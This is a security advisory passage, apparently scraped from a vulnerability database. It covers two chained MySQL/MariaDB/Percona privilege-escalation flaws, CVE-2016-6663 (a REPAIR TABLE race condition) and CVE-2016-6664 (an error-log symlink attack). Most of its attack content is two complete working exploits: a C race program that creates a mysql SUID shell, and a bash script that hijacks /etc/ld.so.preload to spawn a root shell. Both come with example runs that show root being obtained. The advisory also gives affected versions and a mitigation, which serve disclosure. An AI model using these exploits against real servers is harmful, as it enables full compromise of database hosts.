access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory) [pid 1463] lseek(65, 0, SEEK_CUR) = 0 [pid 1463] lseek(65, 0, SEEK_END) = 0 [pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0 [pid 1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66 [pid 1463] lseek(65, 0, SEEK_END) = 0 [pid 1463] lseek(64, 0, SEEK_END) = 1024 [pid 1463] close(65) = 0 [pid 1463] close(66) = 0 [pid 1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 [pid 1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0 [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 [pid 1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0 [pid 1463] unlink("/tmp/disktable/poctab1.MYD") = 0 [pid 1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0 ``` The first call: ``` [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 ``` was found to check file permissions of poctab1.MYD table which are then copied with chmod() to the newly created poctab1.TMD temporary file containing the repaired table. The code is vulnerable to Race Condition between the call: ``` [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 ``` and ``` [pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 ``` If an attacker managed to unlink the temporary table poctab1.TMD and replace it with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), they would be able to apply arbitrary permissions on the data directory. The attacker would be able to control the set of permissions by pre-setting them on poctab1.MYD file before executing the REPAIR TABLE statement. For example, by setting the permissions of poctab1.MYD to 777 the data directory would become readable and writable to the attacker. Obtaining mysql-suid shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Apart from gaining access to arbitrary mysql files, the attacker could also achieve arbitrary code execution in the context of mysql user (mysql shell). This could be done by first pre-setting permissions on poctab1.MYD to 04777 (suid), and winning the race so that the permissions get applied on a copy of a bash shell file through the vulnerable chmod() call effectively creating a shell that elevates their permissions after execution. There is only one problem. Their suid shell would remain to be owned by the attacker's user id and not 'mysql' user. To elevate their privileges, attacker would need to copy the bash shell to a mysql-owned table file which are owned by mysql user. However mysql table files are not writable by other users making it impossible for attacker to save the shell. This could be bypassed if attacker created a specially crafted directory with a group sticky bit and then created a second table named 'poctab2' as follows: attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/ attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/ drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/ mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; Query OK, 0 rows affected (0.00 sec) attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/ total 0 -rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD -rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions of the group on disktable directory) has 'mysql' as the owner but 'attacker' as the group. Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file and preserve the file owner. Finally, they could exploit the Race Condition again and have SUID + exec permissions applied on poctab2.MYD which would then allow them to execute the suid shell with elevated privileges of the mysql user. From mysql to root ~~~~~~~~~~~~~~~~~~~~~~~~ After obtaining a mysql suid shell, attackers could then exploit one of the other MySQL vulnerabilities discovered by the author of this advisory: CVE-2016-6662 or CVE-2016-6664 (Oracle CVE-2016-5617) to escalate their privileges from mysql user to root system user. V. PROOF OF CONCEPT EXPLOIT ------------------------- ------------------[ mysql-privesc-race.c ]-------------------- ``` /* MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 Discovered/Coded by: Dawid Golunski dawid[at]legalhackers.com @dawid_golunski http://legalhackers.com Compile: gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient Note: * On RedHat-based systems you might need to change /tmp to another public directory * For testing purposes only. Do no harm. Full advisory URL: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html */ #include <fcntl.h> #include <grp.h> #include <mysql.h> #include <pwd.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/inotify.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define EXP_PATH "/tmp/mysql_privesc_exploit" #define EXP_DIRN "mysql_privesc_exploit" #define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" #define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" #define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" #define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary MYSQL *conn; // DB handles MYSQL_RES *res; MYSQL_ROW row; unsigned long cnt; void intro() { printf( "\033[94m\n" "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n" "mysql-privesc-race.c (ver. 1.0)\n\n" "CVE-2016-6663 / OCVE-2016-5616\n\n" "For testing purposes only. Do no harm.\n\n" "Discovered/Coded by:\n\n" "Dawid Golunski \n" "http://legalhackers.com" "\033[0m\n\n"); } void usage(char *argv0) { intro(); printf("Usage:\n\n%s user pass db_host database\n\n", argv0); } void mysql_cmd(char *sql_cmd, int silent) { if (!silent) { printf("%s \n", sql_cmd); } if (mysql_query(conn, sql_cmd)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } res = mysql_store_result(conn); if (res>0) mysql_free_result(res); } int main(int argc,char **argv) { int randomnum = 0; int io_notified = 0; int myd_handle; int wpid; int is_shell_suid=0; pid_t pid; int status; struct stat st; /* io notify */ int fd; int ret; char buf[4096] __attribute__((aligned(8))); int num_read; struct inotify_event *event; /* credentials */ char *user = argv[1]; char *password = argv[2]; char *db_host = argv[3]; char *database = argv[4]; // Disable buffering of stdout setvbuf(stdout, NULL, _IONBF, 0); // Get the params if (argc!=5) { usage(argv[0]); exit(1); } intro(); // Show initial privileges printf("\n[+] Starting the exploit as: \n"); system("id"); // Connect to the database server with provided credentials printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host); conn = mysql_init(NULL); if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } // Prepare tmp dir printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN); umask(000); system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); system("chmod g+s /tmp/" EXP_DIRN ); // Prepare exploit tables :) printf("\n[+] Creating mysql tables \n\n"); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n"); system("cp /bin/bash " SUID_SHELL); system("ls -l " SUID_SHELL); // Use inotify to get the timing right fd = inotify_init(); if (fd < 0) { printf("failed to inotify_init\n"); return -1; } ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ printf("\n[+] Entering the race loop... Hang in there...\n"); while ( is_shell_suid != 1 ) { cnt++; if ( (cnt % 100) == 0 ) { printf("->"); //fflush(stdout); } /* Create empty file , remove if already exists */ unlink(MYSQL_TEMP_FILE); unlink(MYSQL_TAB_FILE); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); /* random num if needed */ srand ( time(NULL) ); randomnum = ( rand() % MAX_DELAY ); // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink pid = fork(); if (pid < 0) { fprintf(stderr, "Fork failed :(\n"); } /* Child process - executes REPAIR TABLE SQL statement */ if (pid == 0) { usleep(500); unlink(MYSQL_TEMP_FILE); mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); // child stops here exit(0); } /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ if (pid > 0 ) { io_notified = 0; while (1) { int processed = 0; ret = read(fd, buf, sizeof(buf)); if (ret < 0) { break; } while (processed < ret) { event = (struct inotify_event *)(buf + processed); if (event->mask & IN_CLOSE) { if (!strcmp(event->name, "exploit_table.TMD")) { //usleep(randomnum); // Set the .MYD permissions to suid+exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE); myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); close(myd_handle); chmod(MYSQL_TAB_FILE, 04777); // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec unlink(MYSQL_TEMP_FILE); symlink(SUID_SHELL, MYSQL_TEMP_FILE); io_notified=1; } } processed += sizeof(struct inotify_event); } if (io_notified) { break; } } waitpid(pid, &status, 0); } // Check if SUID bit was set at the end of this attempt if ( lstat(SUID_SHELL, &st) == 0 ) { if (st.st_mode & S_ISUID) { is_shell_suid = 1; } } } printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt); system("ls -l " SUID_SHELL); printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n"); system(SUID_SHELL " -p -i "); //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); /* close MySQL connection and exit */ printf("\n[+] Job done. Exiting\n\n"); mysql_close(conn); return 0; } ``` Example run: ~~~~~~~~~~~~~~ ``` attacker@xenial:~/mysql-exploit$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.1 LTS Release: 16.04 Codename: xenial attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv ii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries ii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files attacker@xenial:~/mysql-exploit$ id uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' +-----------------------------------------------------------------------------------------------------------------+ | Grants for attacker@localhost | +-----------------------------------------------------------------------------------------------------------------+ | GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | | GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | +-----------------------------------------------------------------------------------------------------------------+ attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as: uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) [+] Connecting to the database `pocdb` as attacker@localhost [+] Creating exploit temp directory /tmp/mysql_privesc_exploit [+] Creating mysql tables DROP TABLE IF EXISTS exploit_table DROP TABLE IF EXISTS mysql_suid_shell CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' [+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : -rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Entering the race loop... Hang in there... [+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: -rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Spawning the mysql SUID shell now... Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) mysql_suid_shell.MYD-4.3$ whoami mysql mysql_suid_shell.MYD-4.3$ id uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* -rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm -rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD -rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI mysql_suid_shell.MYD-4.3$ exit exit [+] Job done. Exiting real 0m28.999s user 0m0.016s sys 0m0.016s ``` Video PoC: ~~~~~~~~~~~~ http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. BUSINESS IMPACT ------------------------- Malicious local users with DB access granted a common set of privileges (SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary code and escalate their privileges to mysql system user. This would allow them to gain access to all of the databases stored on the server as well as exploit CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges to root system user (rootshell) and fully compromise the target server. This vulnerability could for example be exploited by malicious users in a shared hosting environment where each user is supposed to have access to only one database assigned to them. It could also be exploited by attackers who have managed to find a vulnerability in a website and gained access to the target system as a low-privileged user (such as apache/www-data). VII. SYSTEMS AFFECTED ------------------------- MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 When checking if your system contains the patches, note that this vulnerability has been known under two CVE IDs: CVE-2016-6663 CVE-2016-5616 CVE-2016-6663 is the original CVE that was agreed to be used by all the affected vendors. The issue was however mentioned in Oracle CPU mistakenly under a new CVE of CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663. VIII. SOLUTION ------------------------- MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in advance which allowed them to produce patches for this vulnerability before disclosure. Update to security releases issued by the vendor. As a temporary mitigation, you can disable symbolic link support in the database server configuration with the following my.cnf config setting: symbolic-links = 0 Nevertheless, an update to a patched release is recommended. IX. REFERENCES ------------------------- http://legalhackers.com This advisory (CVE-2016-6663 / OCVE-2016-5616): http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html Exploit (mysql-privesc-race.c) source code URL: http://legalhackers.com/exploits/mysql-privesc-race.c Video PoC: http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html Advisory for CVE-2016-6664 / OCVE-2016-5617: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html Vendor updates: http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL http://www.mysql.com/ https://mariadb.org/about/ https://mariadb.com/kb/en/mdb-5552-rn/ https://mariadb.com/kb/en/mdb-10118-rn/ https://mariadb.com/kb/en/mdb-10028-rn/ https://www.percona.com/software X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 01.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. id SSV:92510 last seen 2017-11-19 modified 2016-11-02 published 2016-11-02 reporter Root source https://www.seebug.org/vuldb/ssvid-92510 title MySQL / MariaDB / PerconaDB 提权/条件竞争漏洞(CVE-2016-6663) bulletinFamily exploit description I. VULNERABILITY ------------------------- MySQL / MariaDB / PerconaDB - Root Privilege Escalation MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 II. BACKGROUND ------------------------- MySQL: "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." http://www.mysql.com/products/ http://www.mysql.com/why-mysql/ -- MariaDB: "MariaDB is one of the most popular database servers in the world. Its made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases." https://mariadb.org/about/ -- PerconaDB: "Percona Server for MySQL is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server芒鈧劉s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability." https://www.percona.com/software/mysql-database/percona-server III. INTRODUCTION ------------------------- MySQL-based databases including MySQL, MariaDB and PerconaDB are affected by a privilege escalation vulnerability which can let attackers who have gained access to mysql system user to further escalate their privileges to root user allowing them to fully compromise the system. The vulnerability stems from unsafe file handling of error logs and other files. IV. DESCRIPTION ------------------------- The error.log file on most default installations of MySQL/PerconaDB/MariaDB databases is stored either in /var/log/mysql or /var/lib/mysql directory. The permissions on the file and directory look as follows: ``` root@trusty:/var/lib/mysql# ls -la /var/log/mysql total 468 drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 . drwxrwxr-x 36 root syslog 4096 Sep 11 06:25 .. -rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log root@trusty:/var/lib/mysql# ls -lad /var/log/mysql drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql ``` mysqld_safe wrapper that is normally used for starting MySQL daemon and creating/reopening the error.log performs certain unsafe file operations that may allow attackers to gain root privileges. The wrapper script contains a 'while' loop shown below which monitors the mysqld process and performs a restart in case of the process failure. The restart involves re-creation of the error.log file if syslog logging has not been configured instead of error log files (file-based logging is the default setting on most installations). --------[ mysqld_safe ]-------- ``` [...] while true do rm -f "$pid_file" # Some extra safety start_time=`date +%M%S` eval_log_error "$cmd" if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then touch "$err_log" # hypothetical: log was renamed but not chown $user "$err_log" # flushed yet. we'd recreate it with chmod "$fmode" "$err_log" # wrong owner next time we log, so set fi # it up correctly while we can! [...] ``` ------------------------------- As can be seen, the error.log file is created (touch) and chowned to the user running the mysqld daemon (typically 'mysql'). The operation is vulnerable to a symlink attack. Attackers who obtained access to mysql account, through CVE-2016-6663 vulnerability described at: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html would gain access to /var/log or /var/lib/mysql directories (owned by mysql user) and could therefore easily remove the error.log file and replace it with a symlink to an arbitrary system file and escalate privileges. The privilege escalation could be triggered instantly (without the need to wait for mysql service restart/reboot) by attackers having 'mysql' account by simply killing the mysqld child process (launched by the mysqld_safe wrapper). When the mysqld process gets terminated, the wrapper will then re-itertate the loop shown above and immediately create a mysql-owned file in the location specified by the attacker in the symlink thus allowing attackers to quickly escalate their privileges. V. PROOF OF CONCEPT EXPLOIT ------------------------- -------[ mysql-chowned.sh ]------ ``` #!/bin/bash -p # # MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit # mysql-chowned.sh (ver. 1.0) # # CVE-2016-6664 / OCVE-2016-5617 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # This PoC exploit allows attackers to (instantly) escalate their privileges # from mysql system account to root through unsafe error log handling. # The exploit requires that file-based logging has been configured (default). # To confirm that syslog logging has not been enabled instead use: # grep -r syslog /etc/mysql # which should return no results. # # This exploit can be chained with the following vulnerability: # CVE-2016-6663 / OCVE-2016-5616 # which allows attackers to gain access to mysql system account (mysql shell). # # In case database server has been configured with syslog you may also use: # CVE-2016-6662 as an alternative to this exploit. # # Usage: # ./mysql-chowned.sh path_to_error.log # # # See the full advisory for details at: # https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html # # Video PoC: # https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/mysqlrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0 } #intro echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" id | grep -q mysql if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi echo -e "\n[+] Target MySQL log file set to $ERRORLOG" # [ Active exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); //unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file to /etc rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" # Wait for MySQL to re-open the logs echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER if [ "$THE_ANSWER" = "y" ]; then echo -e "Got it. Executing 'killall mysqld' now..." killall mysqld fi while :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done # /etc/ dir should be owned by mysql user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" chmod 755 /etc/ld.so.preload # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo 2>/dev/null >/dev/null #while :; do # sleep 0.1 # ps aux | grep mysqld | grep -q 'log-error' # if [ $? -eq 0 ]; then # break; # fi #done # Check for the rootshell ls -l $BACKDOORPATH ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi # Execute the rootshell echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" $BACKDOORPATH -p # Job done. cleanexit 0 ``` ------------EOF------------------ Example run ~~~~~~~~~~~~~~~~ ``` mysql_suid_shell.MYD-4.3$ whoami mysql omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server iU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server iF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit mysql-chowned.sh (ver. 1.0) CVE-2016-6664 / OCVE-2016-5617 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) [+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh [+] Symlink created at: lrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload [+] Waiting for MySQL to re-open the logs/MySQL service restart... Do you want to kill mysqld process to instantly get root? :) ? [y/n] y Got it. Executing 'killall mysqld' now... [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: -rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! -rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh Got root! The database server has been ch-OWNED ! [+] Spawning the rootshell /tmp/mysqlrootsh now! mysqlrootsh-4.3# whoami root mysqlrootsh-4.3# exit exit [+] Cleaning up... [+] Job done. Exiting with code 0 ``` Video PoC: ~~~~~~~~~~~~~ http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. BUSINESS IMPACT ------------------------- Although the severity of this issue is lower on its own (attackers need to gain access to mysql system user), the vulnerability could easily be combined with the CVE-2016-6663 issue. The combination of the two would effectively allow low privileged local database users to escalate their system privileges to root system account and allow them to fully compromise the server which increases the severity of this issue. VII. SYSTEMS AFFECTED ------------------------- MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 VIII. SOLUTION ------------------------- Vendors have released patches after private disclosure. Update to the latest version of your DBMS. IX. REFERENCES ------------------------- 